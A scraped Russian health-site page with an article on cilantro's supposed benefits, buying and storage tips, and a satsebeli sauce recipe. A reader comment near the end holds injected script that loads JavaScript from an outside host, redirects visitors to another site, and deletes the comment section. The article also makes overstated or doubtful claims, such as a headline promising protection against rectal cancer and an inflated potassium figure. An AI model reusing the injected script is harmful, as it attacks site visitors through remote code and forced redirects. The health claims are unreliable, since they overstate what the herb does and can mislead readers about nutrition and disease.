Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Кинза – защита от воспале...  >>  Кинза – защита от воспалений и рака прямой кишки
 
Обратная связь
 

Кинза – защита от воспалений и рака прямой кишки

Размер шрифта
16 февраля 2012 10:00
  • google_analytics: false
  • Нравится

Каждый инструмент в оркестре вкуса звучит по-своему, и каждый важен по тем или иным своим качествам. Как выбрать, как хранить и что заправить ароматной кинзой?

1 

Под именем кинзы ее знают на Кавказе, а во всем мире называют кориандр. Само слово – греческое, «кoris» в переводе означает «клоп». В незрелом состоянии растение издает запах клопа. Вот почему в народе кинзу называют клоповником.

В Азербайджане, Армении, Грузии предпочитают листья, в странах Средиземноморья, Китая, Узбекистана – семена. Но это только вкусовые предпочтения – листья кинзы, как и ее семена, одинаково полезны.

Достоинства кинзы

  1. Противовоспалительные свойства

В кинзе много летучих веществ, которые обладают бактерицидными и противовоспалительными свойствами. Главные компоненты эфирного масла — линалоол (60—80 %) и гераниол. Как и все пряные травы, кинза богата витаминами и микроэлементами. Однако больше всего в кинзе калия, цинеола, витамина РР и клетчатки.

  1. Калий

В 100 г кинзы 2043 мг калия. Это количество полностью удовлетворяет суточную потребность человека в этом минерале, который необходим для работы сердечно-сосудистой системы и мышц.

  1. Цинеол

Именно это особое вещество придает кинзе характерный жгучий вкус. Цинеол применяют в медицине как антисептическое и отхаркивающее средство, а также как компонент искусственных эфирных масел. Цинеол в виде паров и эмульсии активен в отношении возбудителей дифтерии и дизентерии, брюшной, тифозной палочки, стрептококка. Он воздействует даже на синегнойную палочку, но слабее.

  1. Витамин PP

В кинзе много витамина PP, который защищает от пеллагры. Напомним, что пеллагра это состояние, при котором у человека развиваются сразу дерматит, диарея и деменция (слабоумие). Витамина РР, защищающего от пеллагры, в кинзе в три раза больше, чем в укропе и петрушке.

  1. Клетчатка

В кинзе много клетчатки. Это самая грубая часть растения, т.е. пищевые волокна, которые человек не может переварить. Клетчатка необходима человеку для нормальной работы кишечника, т. к. она помогает проталкивать пищевой ком, что очень важно при частых запорах и является фактором профилактики рака кишечника.

1

Пьедестал почета по содержанию клетчатки:

Мята – 8 г
Базилик – 3,9 г
Кинза – 2,3 г

Для наибольшего эффекта нужно съедать 500 г зелени в день.

Как выбрать

  • Покупайте свежую траву, а не засушенную.
  • На листах не должно быть следов порчи.
  • Цвет кинзы должен быть ярко-зеленым без желтизны, а сама зелень – упругой.
  • Лучше покупать кинзу в тепличных горшочках, т.к. срезанные веточки теряют до 70% витаминов.

Как хранить

Кинзу нужно хранить в холодильнике в горшочке или в пластиковой таре и использовать в течение 2-3 дней. Можно хранить зелень кинзы и в резервуаре с водой, так она сохранится чуть дольше.

В сушеной и замороженной кинзе остаются только грубые волокна и больше ничего, поэтому она практически не приносит пользы.

Как готовить

В пищу употреблять кинзу лучше всего в свежем виде. Можно ее нарезать и добавить в салат. А лучше всего есть цельную зелень. Нужно помнить, что термически обработанная трава кинзы теряет свои полезные качества.

Рецепт соуса «Сацебели»

Ингредиенты:
кинза – 300 г
чеснок – 2-3 зубчика
паста из свежих томатов
аджика – 1 столовая ложка
хмели-сунели – 0,5 чайной ложки
молотые семена кориандра – 0,5 чайной ложки
перец черный
уксус -1 чайная ложка

Приготовление:
Разотрите в ступке зелень кинзы. Постепенно добавьте все компоненты, не прекращая растирать их пестиком до однородной массы. Выложите готовый соус в соусницу и подавайте к столу. Таким соусом рекомендуется приправлять блюда из мяса и птицы.

 

Cюжеты по теме:
Вкус с ярким акцентом. Рецепт соуса с кинзой 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:55

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.